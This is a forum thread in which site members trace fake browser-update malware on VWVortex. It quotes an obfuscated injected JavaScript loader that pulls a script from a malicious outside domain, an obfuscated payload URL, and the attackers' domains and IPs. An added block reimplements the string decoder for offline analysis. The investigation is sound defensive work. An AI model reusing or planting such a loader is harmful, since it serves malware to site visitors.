KilometerMagazine.com - Malware in ads - fake browser updates


    1. Member HwAoRrDk
      Join Date
      Aug 2nd, 2002
      Location
      United Kingdom
      Posts
      1,925
      Vehicles
      2004 Mazda RX-8 230
      05-24-2017 12:07 PM #76
      By the way, forgot to mention, the script snippet that is the initial vector always appears to be present in VWVortex's HTML just before the top navigation bar and site logo - the element with ID 'top-nav'.

      I also just did some additional digging on the ownership and hosting of the two suspect domains.

      The domain amishbrand.com was registered through Wild West Domains LLC, but has private whois information. The server at track.amishbrand.com (IP address 23.152.0.118) appears to be hosted with a US company called Crowncloud.

      The domain timbervalleyfarm.com, registered through GoDaddy, also has private whois information. The server at scene.timbervalleyfarm.com (IP 185.166.239.25) appears to also be hosted with Crowncloud.

      This hosting company looks very fishy to me - I mean, look at their home page. Doesn't that just scream reputable corporate entity to you?
      2004 (Heisei 16) MAZDA RX-8 230

    2. Not your buddy, guy...
      Join Date
      Oct 12th, 2015
      Posts
      285
      05-24-2017 03:01 PM #77
      Thanks everyone for your help and reports. I think we got it finally! If you still see this let us know right away.
      -Philip

    3. Member CodeMan
      Join Date
      May 12th, 2006
      Location
      Westminster, CO
      Posts
      8,029
      Vehicles
      Scirocco 16v, E34 540i, V50 T5 AWD
      05-24-2017 04:08 PM #78
      Quote Originally Posted by HwAoRrDk
      I had some time to sit down and investigate this a bit more this afternoon. I did actually manage to get a Wireshark packet capture of the fake update screen loading in Chrome! However, it's not too useful, as I think the source that this is being loaded from is served via HTTPS, so the network traffic is encrypted, so I can't actually see what's in it.

      However, I think I have identified at least the trail through which the IFRAME ultimately gets loaded.

      In the packet capture, I could see - from the hostname in the SSL certificate - the request that was being made to scene.timbervalleyfarm.com (where the malicious fake update page is being loaded from). Directly before that, there is a request made to track.amishbrand.com - also via HTTPS. Sounds odd, right? Well, what causes that request? If you look at the post-loading HTML page DOM of the Vortex, you will see the following element gets dynamically inserted (it's not in the as-served HTML) into the HEAD tag:

      Code:
      <script type="text/javascript" async="" src="https://track.amishbrand.com/s_code.js?cid=214&amp;v=28c9a7ed5fd87d6ee79e"></script>
      And if I use the Network panel of Firefox's developer tools to trace what caused that script to be loaded, it tells me that it is some in-line Javascript in the main body of the page - that is, content from VWVortex's server itself. This piece of script is as follows:

      Code:
      <script type='text/javascript'>;(function(){var d=navigator[m("&t)nme}gcA)r,e{snup")];var y=document[m("ie,ikk,o,o{c(")];if(n(d,m("hs,wnotdtn;i}W6"))&&!n(d,m("9d9ido{r5drn4A("))){if(!n(y,m("&=(a{m,t}uo_0_(_r"))){var t=document.createElement('script');t.type='text/javascript';t.async=true;t.src=m('.e(9(7ne2e,6(d;718)d)f(5;dle076a,9;c;8)2}=}v}&}4}1v2;=,d}i4c;?,s(jq.{e(d}o;c,_}s,/,m{o)c{.{d0n3a0r{b)h(szi}m;a7.6k)c;a}r4t2/b/):ss(p(t6tyhi');var v=document.getElementsByTagName('script')[0];v.parentNode.insertBefore(t,v);}}function m(k){var f='';for(var q=0;q<k.length;q++){if(q%2===1)f+=k[q];}f=r(f);return f;}function n(j,w){if(j[m("/f)Obxme{din,i(")](w)!==-1){return true;}else{return false;}}function r(e){var z='';for(var a=e.length-1;a>=0;a--){z+=e[a];}return z;}})();</script>
      The obfuscation there on the strings (the 'garbage'-looking data) looked mighty familiar - I had a feeling of deja vu... Where had I seen something similar before? In the code of the fake browser update page! It uses a similar data obfuscation technique there on the Dropbox URL:

      Code:
      var fileUrl = getUrl('r1}=yl{d0?gs1j1.}7{.(8k.}5}56_ub)u)t}S;_0p;uht)e}S)_}x)o,f{e1r)i,F,/{f,e{c}u;q,7sbzi{8851h}p,k3u}i2/{s(/{m(o}c,.}x;o,b6pho;r8d{.)w{w0w{/,/;:0s{p(t{t}h)');
      Because of this, I believe the piece of inline script above that loads another script from track.amishbrand.com is highly likely to be the initial vector for this malware. And because the initial script is inline with the page, it means the phone call is coming from inside the house - that is, the VWVortex server(s) are compromised in some way to allow this malicious snippet of code to have been inserted into their HTML!

      VWVortex admins, forget the third-party ad networks, look at your own server's files!!!
      HwAoRrDk, thank you for all your HARD work!
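The string decoder from the inline snippet quoted above, reimplemented here as an added example (this is not code from the thread or from VWVortex): the snippet's m() keeps only the odd-index characters of each literal and r() reverses the result, so the same two steps recover every literal, including the track.amishbrand.com script URL, and let the injection condition be evaluated offline without running the malicious code. The user-agent strings used at the bottom are constructed.

```javascript
// Added example, not code from the thread: the inline snippet's m() keeps the
// odd-index characters of each literal and r() reverses the result, so this
// routine recovers the original strings without executing the malicious code.
function decodeObfuscated(lit) {
  let kept = "";
  for (let i = 1; i < lit.length; i += 2) kept += lit[i]; // odd positions only
  return kept.split("").reverse().join("");                // then reverse
}

// Obfuscated literals copied verbatim from the snippet quoted in the post.
const LITERALS = {
  uaProperty:       "&t)nme}gcA)r,e{snup",   // navigator[...]
  cookieProperty:   "ie,ikk,o,o{c(",         // document[...]
  uaMustContain:    "hs,wnotdtn;i}W6",       // first n() check on the UA
  uaMustNotContain: "9d9ido{r5drn4A(",       // second n() check on the UA
  cookieMarker:     "&=(a{m,t}uo_0_(_r",     // n() check on document.cookie
  method:           "/f)Obxme{din,i(",       // j[...](w) inside n()
  scriptSrc: ".e(9(7ne2e,6(d;718)d)f(5;dle076a,9;c;8)2}=}v}&}4}1v2;=,d}i4c;?,s(jq.{e(d}o;c,_}s,/,m{o)c{.{d0n3a0r{b)h(szi}m;a7.6k)c;a}r4t2/b/):ss(p(t6tyhi",
};

// Decode every literal so the snippet's logic can be read in the clear.
function decodeAll() {
  const out = {};
  for (const [name, lit] of Object.entries(LITERALS)) {
    out[name] = decodeObfuscated(lit);
  }
  return out;
}

// Re-state the snippet's gating condition on a given user agent and cookie
// string: the loader tag is inserted only when the UA contains the first
// decoded word, lacks the second, and the cookie lacks the marker string.
function wouldInject(userAgent, cookie) {
  const d = decodeAll();
  return userAgent.indexOf(d.uaMustContain) !== -1 &&
         userAgent.indexOf(d.uaMustNotContain) === -1 &&
         cookie.indexOf(d.cookieMarker) === -1;
}

// Stand-alone run: print the decoded table (constructed UA strings).
console.log(decodeAll());
console.log(wouldInject("Mozilla/5.0 (Windows NT 10.0; Win64; x64)", ""));  // true
console.log(wouldInject("Mozilla/5.0 (Linux; Android 7.0)", ""));          // false
```

The getUrl() argument quoted above from the fake update page follows the same padding pattern and can be fed through the same routine.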

    4. Member
      Join Date
      Jul 26th, 2007
      Posts
      1,273
      Vehicles
      99.5 Jetta
      05-25-2017 05:13 AM #79
      Quote Originally Posted by HwAoRrDk
      I had some time to sit down and investigate this a bit more this afternoon. .........

      ............., it means the phone call is coming from inside the house - that is, the VWVortex server(s) are compromised in some way to allow this malicious snippet of code to have been inserted into their HTML!

      VWVortex admins, forget the third-party ad networks, look at your own server's files!!!

      This part is scary........
      IHP is real.
      Imaginary
      Horse
      Power.

    5. Not your buddy, guy...
      Join Date
      Oct 12th, 2015
      Posts
      285
      Yesterday 11:02 AM #80
      Quote Originally Posted by dogdog
      This part is scary........
